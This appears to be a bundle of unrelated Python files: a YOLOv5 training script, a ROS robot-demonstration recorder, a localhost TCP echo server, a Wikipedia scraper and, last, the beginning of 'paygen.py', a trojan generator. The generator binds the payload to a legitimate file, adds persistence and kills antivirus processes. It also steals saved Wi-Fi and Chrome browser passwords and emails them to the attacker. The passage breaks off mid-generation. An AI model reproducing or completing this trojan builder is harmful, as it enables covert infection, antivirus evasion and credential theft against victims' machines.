verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss,
is_coco=is_coco,
)
# Write
with open(results_file, "a") as f:
f.write(s + "%10.4g" * 7 % results + "\n") # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system(
"gsutil cp %s gs://%s/results/results%s.txt"
% (results_file, opt.bucket, opt.name)
)
# Log
tags = [
"train/box_loss",
"train/obj_loss",
"train/cls_loss", # train loss
"metrics/precision",
"metrics/recall",
"metrics/mAP_0.5",
"metrics/mAP_0.5:0.95",
"val/box_loss",
"val/obj_loss",
"val/cls_loss", # val loss
"x/lr0",
"x/lr1",
"x/lr2",
] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb_logger.wandb:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(
np.array(results).reshape(1, -1)
) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {
"epoch": epoch,
"best_fitness": best_fitness,
"training_results": results_file.read_text(),
"model": deepcopy(
model.module if is_parallel(model) else model
).half(),
"ema": deepcopy(ema.ema).half(),
"updates": ema.updates,
"optimizer": optimizer.state_dict(),
"wandb_id": wandb_logger.wandb_run.id
if wandb_logger.wandb
else None,
}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if wandb_logger.wandb:
if (
(epoch + 1) % opt.save_period == 0 and not final_epoch
) and opt.save_period != -1:
wandb_logger.log_model(
last.parent, opt, epoch, fi, best_model=best_fitness == fi
)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb_logger.wandb:
files = [
"results.png",
"confusion_matrix.png",
*[f"{x}_curve.png" for x in ("F1", "PR", "P", "R")],
]
wandb_logger.log(
{
"Results": [
wandb_logger.wandb.Image(str(save_dir / f), caption=f)
for f in files
if (save_dir / f).exists()
]
}
)
# Test best.pt
logger.info(
"%g epochs completed in %.3f hours.\n"
% (epoch - start_epoch + 1, (time.time() - t0) / 3600)
)
if opt.data.endswith("coco.yaml") and nc == 80: # if COCO
for m in (last, best) if best.exists() else (last): # speed, mAP tests
results, _, _ = test.test(
opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False,
is_coco=is_coco,
)
# Strip optimizers
final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if opt.bucket:
os.system(f"gsutil cp {final} gs://{opt.bucket}/weights") # upload
if wandb_logger.wandb: # Log the stripped model
wandb_logger.wandb.log_artifact(
str(final),
type="model",
name="run_" + wandb_logger.wandb_run.id + "_model",
aliases=["last", "best", "stripped"],
)
wandb_logger.finish_run()
else:
dist.destroy_process_group()
torch.cuda.empty_cache()
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--weights", type=str, default="yolov5s.pt", help="initial weights path"
)
parser.add_argument("--cfg", type=str, default="", help="model.yaml path")
parser.add_argument(
"--data",
type=str,
default="/data/minki/kaggle/vinbigdata-cxr/yolov5/config0.yaml",
help="*.data path",
) # 'data/coco128.yaml'
# # FIXME:
# parser.add_argument(
# "--fold",
# type=str,
# required=True,
# help="0..6 data folds",
# ) # 'data/coco128.yaml'
# "data/coco128.yaml"
parser.add_argument(
"--hyp",
type=str,
default="data/hyp.scratch.yaml",
help="hyperparameters path",
)
parser.add_argument("--epochs", type=int, default=300)
parser.add_argument(
"--batch-size", type=int, default=10, help="total batch size for all GPUs"
)
parser.add_argument(
"--img-size",
nargs="+",
type=int,
default=[1024, 1024],
help="[train, test] image sizes",
)
parser.add_argument("--rect", action="store_true", help="rectangular training")
parser.add_argument(
"--resume",
nargs="?",
const=True,
default=False,
help="resume most recent training",
)
parser.add_argument(
"--nosave", action="store_true", help="only save final checkpoint"
)
parser.add_argument("--notest", action="store_true", help="only test final epoch")
parser.add_argument(
"--noautoanchor", action="store_true", help="disable autoanchor check"
)
parser.add_argument("--evolve", action="store_true", help="evolve hyperparameters")
parser.add_argument("--bucket", type=str, default="", help="gsutil bucket")
parser.add_argument(
"--cache-images", action="store_true", help="cache images for faster training"
)
parser.add_argument(
"--image-weights",
action="store_true",
help="use weighted image selection for training",
)
parser.add_argument(
"--device", default="", help="cuda device, i.e. 0 or 0,1,2,3 or cpu"
)
parser.add_argument(
"--multi-scale", action="store_true", help="vary img-size +/- 50%%"
)
parser.add_argument(
"--single-cls",
action="store_true",
help="train multi-class data as single-class",
)
parser.add_argument(
"--adam", action="store_true", help="use torch.optim.Adam() optimizer"
)
parser.add_argument(
"--sync-bn",
action="store_true",
help="use SyncBatchNorm, only available in DDP mode",
)
parser.add_argument(
"--local_rank", type=int, default=-1, help="DDP parameter, do not modify"
)
parser.add_argument(
"--workers", type=int, default=8, help="maximum number of dataloader workers"
)
parser.add_argument(
"--project",
default="/data/minki/kaggle/vinbigdata-cxr/yolov5/runs/train",
help="save to project/name",
)
parser.add_argument("--entity", default=None, help="W&B entity")
parser.add_argument("--name", default="exp", help="save to project/name")
parser.add_argument(
"--exist-ok",
action="store_true",
help="existing project/name ok, do not increment",
)
parser.add_argument("--quad", action="store_true", help="quad dataloader")
parser.add_argument("--linear-lr", action="store_true", help="linear LR")
parser.add_argument(
"--upload_dataset",
action="store_true",
help="Upload dataset as W&B artifact table",
)
parser.add_argument(
"--bbox_interval",
type=int,
default=-1,
help="Set bounding-box image logging interval for W&B",
)
parser.add_argument(
"--save_period",
type=int,
default=-1,
help='Log model after every "save_period" epoch',
)
parser.add_argument(
"--artifact_alias",
type=str,
default="latest",
help="version of dataset artifact to be used",
)
opt = parser.parse_args()
# FIXME:
# opt.data = f"{opt.data}/config{opt.fold}.yaml"
# Set DDP variables
opt.world_size = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
opt.global_rank = int(os.environ["RANK"]) if "RANK" in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
wandb_run = resume_and_get_id(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = (
opt.resume if isinstance(opt.resume, str) else get_latest_run()
) # specified or most recent path
assert os.path.isfile(ckpt), "ERROR: --resume checkpoint does not exist"
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / "opt.yaml") as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
(
opt.cfg,
opt.weights,
opt.resume,
opt.batch_size,
opt.global_rank,
opt.local_rank,
) = (
"",
ckpt,
True,
opt.total_batch_size,
*apriori,
) # reinstate
logger.info("Resuming training from %s" % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = (
check_file(opt.data),
check_file(opt.cfg),
check_file(opt.hyp),
) # check files
assert len(opt.cfg) or len(
opt.weights
), "either --cfg or --weights must be specified"
opt.img_size.extend(
[opt.img_size[-1]] * (2 - len(opt.img_size))
) # extend to 2 sizes (train, test)
opt.name = "evolve" if opt.evolve else opt.name
opt.save_dir = increment_path(
Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve
) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device("cuda", opt.local_rank)
dist.init_process_group(
backend="nccl", init_method="env://"
) # distributed backend
assert (
opt.batch_size % opt.world_size == 0
), "--batch-size must be multiple of CUDA device count"
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
prefix = colorstr("tensorboard: ")
logger.info(
f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/"
)
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {
"lr0": (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
"lrf": (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
"momentum": (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
"weight_decay": (1, 0.0, 0.001), # optimizer weight decay
"warmup_epochs": (1, 0.0, 5.0), # warmup epochs (fractions ok)
"warmup_momentum": (1, 0.0, 0.95), # warmup initial momentum
"warmup_bias_lr": (1, 0.0, 0.2), # warmup initial bias lr
"box": (1, 0.02, 0.2), # box loss gain
"cls": (1, 0.2, 4.0), # cls loss gain
"cls_pw": (1, 0.5, 2.0), # cls BCELoss positive_weight
"obj": (1, 0.2, 4.0), # obj loss gain (scale with pixels)
"obj_pw": (1, 0.5, 2.0), # obj BCELoss positive_weight
"iou_t": (0, 0.1, 0.7), # IoU training threshold
"anchor_t": (1, 2.0, 8.0), # anchor-multiple threshold
"anchors": (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
"fl_gamma": (
0,
0.0,
2.0,
), # focal loss gamma (efficientDet default gamma=1.5)
"hsv_h": (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
"hsv_s": (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
"hsv_v": (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
"degrees": (1, 0.0, 45.0), # image rotation (+/- deg)
"translate": (1, 0.0, 0.9), # image translation (+/- fraction)
"scale": (1, 0.0, 0.9), # image scale (+/- gain)
"shear": (1, 0.0, 10.0), # image shear (+/- deg)
"perspective": (
0,
0.0,
0.001,
), # image perspective (+/- fraction), range 0-0.001
"flipud": (1, 0.0, 1.0), # image flip up-down (probability)
"fliplr": (0, 0.0, 1.0), # image flip left-right (probability)
"mosaic": (1, 0.0, 1.0), # image mixup (probability)
"mixup": (1, 0.0, 1.0),
} # image mixup (probability)
assert opt.local_rank == -1, "DDP mode not implemented for --evolve"
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / "hyp_evolved.yaml" # save best result here
if opt.bucket:
os.system(
"gsutil cp gs://%s/evolve.txt ." % opt.bucket
) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path(
"evolve.txt"
).exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = "single" # parent selection method: 'single' or 'weighted'
x = np.loadtxt("evolve.txt", ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == "single" or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == "weighted":
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (
g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1
).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(
f"Hyperparameter evolution complete. Best results saved as: {yaml_file}\n"
f"Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}111"
)
|
record_demonstration.py
|
#! /usr/bin/python
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import cv2
import sys
import os
from os.path import expanduser
import signal
import threading
from multiprocessing import Pool
import time
from random import randint
from std_msgs.msg import Float32MultiArray
from leap_client.msg import HandInfoList
def signal_handler(signal, frame):
global record_demonstratio
n
record_demonstration.end_thread = True
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
class RecordDemonstration(object):
def __init__(self):
# parameters
self.task = 3006
# person controlling the robot: 1-Rouhollah, 2-Pooya
self.user_id = 1
self.image_shape = (540, 540)
self.recordDelay = .03
self.camera1 = True
self.camera2 = False
self.camera3 = False
self.al5d = True
self.mico = False
self.task_description = {
5000: "Human demonstrations",
3001: "Grab a bubble wrap and put it into plate",
3002: "Push the plate to the left",
3003: "Push the box towards the robot's base",
3004: "Push and roll the bottle towards the robot's base",
3005: "Pick up the towel and clean the screwdriver box",
3006: "rotate the pliers wrench to a perpendicular orientation",
# first camera calibration:
1001: "Put three small objects into the container",
1002: "Grab a pen and put it into user's hand",
1003: "Take the stirring bar from the user, stir a coffee cup, give it back to the user",
1004: "Grab capsules from the table and put them into their bottle",
1005: "Grab a paper cup and pour its content into a plate",
1006: "Push all small cubes and gather them in the middle of table",
1007: "The small towel is already folded. fold it one more time",
1008: "Grab a paper cup and put it into a tea cup",
1009: "Grab the spoon and fork and put them into the plate, spoon on right, fork on left",
1010: "Pick up a thick marker and put it into upright position",
1011: "Push and rotate the markers and gather them close to the robot base",
1012: "Stay in the middle position. Don't move!",
1013: "Pick up a mug and place it on the table where the user is pointing",
1014: "scoop ...",
# second camera calibration:
1501: "Grab 6 small cubes in a cluttered situation and put them into a plate",
1502: "Grab a marker and put it into the cup. Then, put it back on the table.",
# second camera calibration, each task 5 minutes, 10,000 waypoints
2001: "Grab 3 small markers and arrange them vertically on the right side",
2002: "Grab 3 small markers and arrange them horizontally on the right side",
2003: "Grab 3 small markers and arrange them vertically on the left side",
2004: "Grab 3 small markers and arrange them horizontally on the left side",
2005: "Grab 3 small markers and make a triangle with them",
2006: "Grab 3 small markers, put one on the left, one on the right, and one in the middle",
2007: "Grab 3 small markers and make a horizontal line with them",
2008: "Grab 3 small markers and write the character Y with them",
2009: "Grab 3 small markers and write the character U with them",
2010: "Grab 3 small markers and write the character H with them",
2011: "Grab 3 small markers and write the character N with them",
2012: "Grab 3 small markers and write the character T with them",
2013: "Grab 3 small markers and write the reversed character N with them",
2014: "Grab 3 small markers and write the reversed character Y with them",
2015: "Grab 3 small markers and write the reversed character U with them",
2016: "Grab 3 small markers and write the 90 degree rotated character H with them",
2017: "Grab 3 small markers and write the reversed character T with them",
2018: "Grab 3 small markers and write the character K with them",
2019: "Grab 3 small markers, put one vertically on the right, and two vertically on the left",
2020: "Grab 3 small markers, put one vertically on the left, and two vertically on the right",
2021: "Grab 3 small markers, put one horizontally on the right, and two horizontally on the left",
2022: "Grab 3 small markers, put one horizontally on the left, and two horizontally on the right",
2023: "Grab 3 small markers, put one vertically on the right, and two horizontally on the left",
2024: "Grab 3 small markers, put one horizontally on the left, and two vertically on the right",
2025: "Grab 3 small markers, put one vertically on the right, and make a vertical line with the other two",
2026: "Grab 3 small markers, put one vertically on the left, and make a vertical line with the other two",
2027: "Grab 3 small markers, put one vertically on the right, and make a horizontal line with the other two",
2028: "Grab 3 small markers, put one vertically on the left, and make a horizontal line with the other two",
2029: "Grab 3 small markers and put them into the coffee cup on the right",
2030: "Grab 3 small markers that are inside a coffee cup on the right and put them on the desk",
2031: "Grab 3 small markers and put them into the coffee cup on the left",
2032: "Grab 3 small markers that are inside a coffee cup on the left and put them on the desk",
2033: "Grab 3 small markers, put one into the coffee cup on the left, and the others into the coffee cup on the right",
2034: "Grab 3 small markers, put one into the coffee cup on the right, and the others into the coffee cup on the left",
2035: "Grab 2 small markers, put one into the coffee cup on the right, and the other into the coffee cup on the left",
2036: "Grab 2 small markers, put one into the coffee cup on the left, and the other into the coffee cup on the right",
2037: "Grab one small marker from each coffee cup and put them on the desk",
2038: "Grab one small marker from the coffee cup on the right and put it into the coffee cup on the left",
2039: "Grab one small marker from the coffee cup on the left and put it into the coffee cup on the right",
2040: "Grab 4 small markers and make a square with them",
2041: "Grab 4 small markers and make a cross with them",
2042: "Grab 4 small markers and make a 45 degree rotated square with them",
2043: "Grab 4 small markers and make a plus with them",
2044: "Grab 4 small markers, put one vertically on the right and three vertically on the left",
2045: "Grab 4 small markers, put one horizontally on the right and three vertically on the left",
2046: "Grab 4 small markers, put one vertically on the right and three horizontally on the left",
2047: "Grab 4 small markers, put one horizontally on the right and three horizontally on the left",
2048: "Grab 4 small markers, put two vertically on the right and two vertically on the left",
2049: "Grab 4 small markers, put two horizontally on the right and two vertically on the left",
2050: "Grab 4 small markers, put two vertically on the right and two horizontally on the left",
2051: "Grab 4 small markers, put two horizontally on the right and two horizontally on the left",
2052: "Grab 4 small markers and draw the bottom half of a star with them",
2053: "Grab 4 small markers and draw the upper half of a star with them",
2054: "Grab 4 small markers and draw the character '=' with them",
2055: "Grab 4 small markers and draw the 90 degree rotated character '=' with them",
2056: "Grab 4 small markers and draw the character 'W' with them",
2057: "Grab 4 small markers and draw the character 'M' with them",
2058: "Grab 4 small markers and draw the character 'E' with them",
2059: "Grab 4 small markers and draw the reversed character 'E' with them",
2060: "Grab 4 small markers and draw the character 'm' with them",
2061: "Grab 4 small markers and draw the reversed character 'm' with them",
}
# initialization
self.filepath = expanduser("~") + '/t/task-' + str(self.task) + '/' + str(randint(0,1000000))
rospy.init_node('record_demonstration')
if self.camera1:
self.create_folders(self.filepath + '/camera-' + str(1) + '/')
# self.create_folders(self.filepath + '/camera-' + str(1) + '-depth/')
rospy.Subscriber("/kinect2/qhd/image_color_rect", Image, self.camera1_callback)
# rospy.Subscriber("/kinect2/hd/image_depth_rect", Image, self.camera1_depth_callback)
if self.camera2:
self.create_folders(self.filepath + '/camera-' + str(2) + '/')
rospy.Subscriber("/usb_cam/image_raw", Image, self.camera2_callback)
if self.camera3:
self.create_folders(self.filepath + '/camera-' + str(3) + '/')
rospy.Subscriber("/kinect2/qhd/image_color_rect", Image, self.camera3_callback)
if self.al5d:
self.write_file_header()
rospy.Subscriber("/leap_al5d_info", Float32MultiArray, self.leap_al5d_callback)
if self.mico:
self.write_file_header()
rospy.Subscriber("/leap_mico_info", Float32MultiArray, self.leap_mico_callback)
self.bridge = CvBridge()
self.timestep = 0
self.task_complete_count = 0
self.rate = rospy.Rate(self.recordDelay*1000)
self.last_reward_time = 0
self.last_robot_msg = 0
self.start_time = rospy.get_time()
self.end_thread = False
self.pause = False
# self.pool = Pool(2)
self.thread = threading.Thread(target= self._update_thread)
self.thread.start()
def save_image(self, img_msg, camera):
try:
img = self.bridge.imgmsg_to_cv2(img_msg, "bgr8")
img = np.array(img, dtype=np.float)
except CvBridgeError, e:
print(e)
else:
img = img[0:540, 250:840]
img = cv2.resize(img, self.image_shape)
cv2.imwrite(self.filepath + '/camera-' + str(camera) + '/' + str(self.timestep) +
'.jpg', img, [int(cv2.IMWRITE_JPEG_QUALITY), 80])
def save_image_depth(self, img_msg, camera):
try:
img = self.bridge.imgmsg_to_cv2(img_msg, "16UC1")
img = np.array(img, dtype=np.float32)
cv2.normalize(img, img, 0, 1, cv2.NORM_MINMAX)
except CvBridgeError, e:
print(e)
else:
img = cv2.resize(img, self.image_shape)
cv2.imwrite(self.filepath + '/camera-' + str(camera) + '-depth/' + str(self.timestep) +
'.jpg', img*255.0, [int(cv2.IMWRITE_JPEG_QUALITY), 80])
def camera1_callback(self, msg):
self.camera1_msg = msg
def camera1_depth_callback(self, msg):
self.camera1_depth_msg = msg
def camera2_callback(self, msg):
self.camera2_msg = msg
def camera3_callback(self, msg):
self.camera3_msg = msg
def leap_al5d_callback(self, msg):
self.leap_al5d_msg = msg
self.last_robot_msg = rospy.get_time()
def leap_mico_callback(self, msg):
self.leap_mico_msg = msg
def create_folders(self, foldername):
if not os.path.exists(foldername):
try:
os.makedirs(foldername)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
def write_file_header(self):
with open(self.filepath + '.txt', 'w') as f:
f.write(str(time.strftime('%l:%M%p %z on %b %d, %Y')) + '\n' + str(self.task_description[self.task]) + '\n')
f.write('time,task,user,robot,reward,human,gripper,joint1,joint2,joint3,joint4,joint5,joint6')
def append_to_file(self, robot):
with open(self.filepath + '.txt', 'a') as f:
str_to_append = '\n' + str(rospy.get_time() - self.start_time) + ',' + str(self.task) + ',' + str(self.user_id) + ','
if robot == 'al5d':
str_to_append = str_to_append + str(1) + ','
data = [x for x in self.leap_al5d_msg.data]
elif robot == 'mico':
str_to_append = str_to_append + str(2) + ','
data = [x for x in self.leap_mico_msg.data]
if abs(data[0] - 1) < .01: # got reward
if rospy.get_time() - self.last_reward_time > 1:
self.task_complete_count += 1
self.last_reward_time = rospy.get_time()
else:
data[0] = 0
sys.stdout.write('\rTimestep: ' + str(self.timestep) + ' Task done: ' + str(self.task_complete_count))
sys.stdout.flush()
str_to_append = str_to_append + ','.join(str(e) for e in data)
f.write(str_to_append)
def _update_thread(self):
while not rospy.is_shutdown() and not self.end_thread:
if self.pause or rospy.get_time() - self.start_time < 1 or rospy.get_time() - self.last_robot_msg > .1:
continue
save_files = (self.camera1 == hasattr(self, 'camera1_msg') and self.camera2 == hasattr(self, 'camera2_msg')
and self.camera3 == hasattr(self, 'camera3_msg') and self.al5d == hasattr(self, 'leap_al5d_msg')
and self.mico == hasattr(self, 'leap_mico_msg'))
if save_files:
if self.camera1:
# # self.pool.map(self.save_image, [(self.camera1_msg, 1)])
self.save_image(self.camera1_msg, 1)
# self.save_image_depth(self.camera1_depth_msg, 1)
if self.camera2:
# self.pool.map(self.save_image, [(self.camera2_msg, 2)])
self.save_image(self.camera2_msg, 2)
if self.camera3:
self.save_image(self.camera2_msg, 3)
if self.al5d:
self.append_to_file('al5d')
if self.mico:
self.append_to_file('mico')
self.timestep += 1
self.rate.sleep()
def main():
global record_demonstration
record_demonstration = RecordDemonstration()
rospy.spin()
# while not rospy.is_shutdown() and not record_demonstration.end_thread:
# input = raw_input(">>>")
# record_demonstration.pause = not record_demonstration.pause
if __name__ == '__main__':
main()
|
tcp_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 22 16:55:20 2020
@author: edoardottt
"""
import socket
import threading
bind_ip = "127.0.0.1"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print("[*] Listening on {}:{}".format(bind_ip, bind_port))
# this is our client-handling thread
def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(4096)
print("[*] Received: {}".format(request))
# send back a packet
client_socket.send(b"ACK!")
client_socket.close()
while True:
client, addr = server.accept()
print("[*] Accepted connection from {}:{}".format(addr[0], addr[1]))
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
Wikipedia.py
|
import wikipedia
import itertools
import threading
import time
import sys
#print(wikipedia.search('Egypt', results=15))
#print(wikipedia.geosearch(40.775114, -73.968802,title=None, results=10, radius=1000))
TitlesList = []
Results = []
print("")
topic = input('Please Enter The Topic : ')
n = int(input('Please Enter Number Of Result You Want [The Larger Number > The More Searching Time] : '))
for title in wikipedia.search(topic,n) :
TitlesList.append(title)
print("")
if n == 0:
print(' You Entered [0] So There Is No Result For You Today :D ')
exit()
print('[Please Wait] We Are Working Hard On The Following Topics')
print(TitlesList)
print("")
for x in range(100):
sys.stdout.write('\rConnecting To Servers .... ' +str(x))
sys.stdout.flush()
time.sleep(0.1)
time.sleep(5)
done = False
#here is the animation
#(['|', '/', '-', '\\'])
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rGrabing Data .... ' + c)
sys.stdout.flush()
time.sleep(0.1)
print("\n")
t = threading.Thread(target=animate)
t.start()
for onetitle in TitlesList:
titlePage = wikipedia.page(onetitle)
Results.append(titlePage.content)
time.sleep(10)
print('==============================================================================')
num = 0
done=True
for title in TitlesList:
with open(title+'.txt', 'w', encoding="utf-8") as output:
output.writelines(' ------ '+title+' ------ '+'\n')
output.writelines('==================================================\n')
output.writelines(Results[num])
num = num+1
output.writelines('\n')
output.writelines('==================================================\n')
print(' '+title+' <-> Done')
time.sleep(5)
|
paygen.py
|
#!/usr/bin/env python3
import encrypt_code
import os
import argparse
import subprocess
import shutil
import banners
import platform
from essential_generators import DocumentGenerator
from colorama import init
from colorama import Fore, Back, Style
init()
if platform.system() == 'Windows':
PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
Attacker_System = 'Windows'
elif platform.system() == 'Linux':
Attacker_System = 'Linux'
PYTHON_PYINSTALLER_PATH = "wine ~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe"
def get_options():
parser = argparse.ArgumentParser(description=f'{Fore.RED}THorse v1.7')
parser._optionals.title = f"{Fore.GREEN}Optional Arguments{Fore.YELLOW}"
parser.add_argument("-w", "--windows", dest="windows", help="Generate a Windows executable.", action='store_true')
parser.add_argument("-l", "--linux", dest="linux", help="Generate a Linux executable.", action='store_true')
parser.add_argument("-t", "--persistence", dest="time_persistent", help="Becoming Persistence After __ seconds. default=10", default=10)
parser.add_argument("-b", "--bind", dest="bind", help="AutoBinder : Specify Path of Legitimate file.")
parser.add_argument("-k", "--kill_av", dest="kill_av", help="AntivirusKiller : Specify AV's .exe which need to be killed. Ex:- --kill_av cmd.exe")
parser.add_argument("-s", "--steal-password", dest="stealer", help=f"Steal Saved Password from Victim Machine [{Fore.RED}Supported OS : Windows{Fore.YELLOW}]", action='store_true')
parser.add_argument("-d", "--debug", dest="debug", help=f"Run Virus in Foreground", action='store_true')
required_arguments = parser.add_argument_group(f'{Fore.RED}Required Arguments{Fore.GREEN}')
required_arguments.add_argument("--icon", dest="icon", help="Specify Icon Path, Icon of Evil File [Note : Must Be .ico].")
required_arguments.add_argument("--ip", dest="ip", help="Email address to send reports to.")
required_arguments.add_argument("--port", dest="port", help="Port of the IP Address given in the --ip argument.")
required_arguments.add_argument("-e", "--email", dest="email", help="Email address to send \'TrojanHorse Started\' Notification with other Juicy Info.")
required_arguments.add_argument("-p", "--password", dest="password", help="Password for the email address given in the -e argument.")
required_arguments.add_argument("-o", "--output", dest="output", help="Output file name.", required=True)
return parser.parse_args()
def get_python_pyinstaller_path():
try:
if os.name in ('ce', 'nt', 'dos'):
# If OS == Windows
python_path = subprocess.check_output("where pyinstaller.exe", shell=True)
elif 'posix' in os.name:
# If OS == Linux
python_path = subprocess.check_output("which pyinstaller.exe", shell=True)
python_path = str(python_path).split('\'')[1]
python_path = python_path.split("\\n")[0]
python_path = python_path.replace("\\r", "")
python_path = python_path.replace("\\\\", "/")
except Exception:
python_path = "UnableToFind"
return python_path
def check_dependencies():
print(f"{Fore.YELLOW}\n[*] Checking Dependencies...")
try:
import mss, essential_generators, PyInstaller, six, cryptography
print(f"{Fore.GREEN}[+] All Dependencies are Installed on this system ;)\n")
except Exception as e:
print(f"[!] Error : {e}")
try:
print(f"{Fore.YELLOW}[*] Installing All Dependencies From Scratch...\n")
print(f'\n{Fore.WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
import pip
while 1:
pip.main(['install', 'mss'])
pip.main(['install', 'essential_generators'])
pip.main(['install', 'PyInstaller'])
pip.main(['install', 'six'])
pip.main(['install', 'python-xlib'])
pip.main(['install', 'cryptography'])
print(f'\n{Fore.WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
print(f"{Fore.GREEN}\n[+] Dependencies installed correctly ;)\n")
break
except:
print(f"{Fore.RED}\n[!] Unable to Install Dependencies, Please Try Again :(\n")
quit()
def create_trojan(file_name, email, password, ip, port, time_persistent, legitimate_file=None):
with open(file_name, "w+") as file:
file.write("import payload, win32event, winerror, win32api\n")
if arguments.stealer:
file.write("import password_stealer\n")
if arguments.bind or arguments.stealer:
file.write("import threading\n\n")
if arguments.bind != None:
#Codes to Run, Legitimate File on Front End
file.write("import subprocess, sys\n\n")
file.write("def run_front_file():\n")
file.write(f"\tfile_name = sys._MEIPASS.replace('\\\\', '/') + \"/{legitimate_file}\" \n")
file.write(f"\tsubprocess.call(file_name, shell=True)\n\n")
#Running Front End File on Different Thread
file.write("t1 = threading.Thread(target=run_front_file)\n")
file.write("t1.start()\n\n")
#Below Codes will check for already running instance,
file.write("\nmutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')\n\n")
if arguments.stealer:
#Saved Password Stealer
file.write("def steal():\n")
file.write(f"\tsteal = password_stealer.SendPass(\'{email}\', \'{password}\')\n")
file.write(f"\tsteal.get_wifi_creds()\n")
file.write(f"\tprint(\"[+] Wifi Password Send Successfully!\")\n")
file.write(f"\tsteal.get_chrome_browser_creds()\n")
file.write(f"\tprint(\"[+] Chrome Browser Password Send Successfully!\")\n\n")
file.write("def check_and_start():\n")
file.write("\tif win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:\n")
file.write("\t\tmutex = None\n")
